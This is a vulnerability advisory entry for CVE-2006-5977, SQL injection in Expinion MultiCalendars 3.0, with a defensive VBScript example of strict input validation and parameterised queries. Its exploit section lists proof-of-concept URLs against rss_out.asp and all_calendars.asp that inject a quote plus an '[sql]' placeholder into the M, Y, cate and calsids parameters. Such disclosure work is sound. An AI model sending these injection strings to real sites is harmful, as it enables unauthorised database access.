MultiCalendars Multiple SQL Injection Vulnerabilities

Vulnerability ID: 1192834
Vulnerability type: SQL injection
Published: 2006-11-20
Updated: 2006-11-20
CVE ID: CVE-2006-5977
CNNVD ID: CNNVD-200611-312
Platform: N/A
CVSS score: 7.5
|Vulnerability sources
https://www.securityfocus.com/bid/87189
https://cxsecurity.com/issue/WLB-2006110086
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-312
|Vulnerability details
MultiCalendars contains multiple SQL injection vulnerabilities. A remote attacker can execute arbitrary SQL commands via the (1) M or (2) Y parameter passed to rss_out.asp, or the (3) cate parameter passed to all_calendars.asp. The root cause is the classic pattern of building the SQL statement by concatenating unvalidated query-string values, so a single quote in the parameter terminates the intended literal.
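The remedy for this class of bug in a classic ASP page such as rss_out.asp is to validate M and Y as integers and bind them as typed query parameters instead of splicing them into the SQL string. The following is an added illustration, not MultiCalendars' own code; the table and column names (tblEvents, EventDate, Title) and the already-open ADODB connection object `conn` are assumptions.

```vbscript
<%
Option Explicit
' Added example (not the product's source): handling the M (month) and Y (year)
' query parameters of an rss_out.asp-style page safely. tblEvents, EventDate,
' Title and the open ADODB connection "conn" are assumptions.

' Vulnerable pattern described in the advisory: the raw parameter becomes part
' of the SQL text, so M=' (or Y=') breaks out of the statement.
'   sql = "SELECT Title FROM tblEvents WHERE Month(EventDate)=" & _
'         Request("M") & " AND Year(EventDate)=" & Request("Y")

' Hardened form, step 1: allow-list the input shape (digits only, in range).
' IsNumeric alone is too permissive: it accepts "1e3", "&H10" and " 12 ".
Function StrictInt(value, minVal, maxVal)
    ' Returns the integer value, or -1 when the input is not 1-4 ASCII digits
    ' or falls outside [minVal, maxVal].
    Dim re
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,4}$"
    If Not re.Test(value) Then
        StrictInt = -1
    ElseIf CLng(value) < minVal Or CLng(value) > maxVal Then
        StrictInt = -1
    Else
        StrictInt = CLng(value)
    End If
End Function

Dim m, y
m = StrictInt(Request.QueryString("M"), 1, 12)
y = StrictInt(Request.QueryString("Y"), 1900, 2100)
If m = -1 Or y = -1 Then
    Response.Status = "400 Bad Request"
    Response.End
End If

' Step 2: bind the values as adInteger (3) input (1) parameters, so they are
' sent to the database separately from the SQL text.
Dim cmd, rs
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = 1  ' adCmdText
cmd.CommandText = "SELECT Title, EventDate FROM tblEvents " & _
                  "WHERE Month(EventDate) = ? AND Year(EventDate) = ?"
cmd.Parameters.Append cmd.CreateParameter("@M", 3, 1, , m)
cmd.Parameters.Append cmd.CreateParameter("@Y", 3, 1, , y)
Set rs = cmd.Execute
Do While Not rs.EOF
    Response.Write Server.HTMLEncode(rs("Title")) & vbCrLf
    rs.MoveNext
Loop
rs.Close
%>
```

The same two steps apply to the cate parameter of all_calendars.asp: validate against the set of category identifiers the page expects, then bind it as a parameter.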
|Vulnerability EXP
vendor site: http://www.expinion.net/
product: MultiCalendars
bug: injection sql
risk: medium

injection sql (get)
http://site.com/rss_out.asp?ID=1&MODE=1&M='[sql]
http://site.com/rss_out.asp?ID=1&MODE=1&M=10&Y='[sql]
http://site.com/all_calendars.asp?month=11&year=2006&cate='[sql]
http://site.com/all_calendars.asp?month=11&year=2006&cate=&ID=&cTYPE=2&calsids='[sql]

laurent gaffi & benjamin moss
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com
|Affected products
Expinion.net MultiCalendars 3.0
|References

Source: XF
Name: multicalendars-rssout-allcal-sql-injection(30301)
Link: http://xforce.iss.net/xforce/xfdb/30301
Source: BUGTRAQ
Name: 20061115 MultiCalendars [multiples injection sql]
Link: http://www.securityfocus.com/archive/1/archive/1/451642/100/0/threaded
Source: SREASON
Name: 1883
Link: http://securityreason.com/securityalert/1883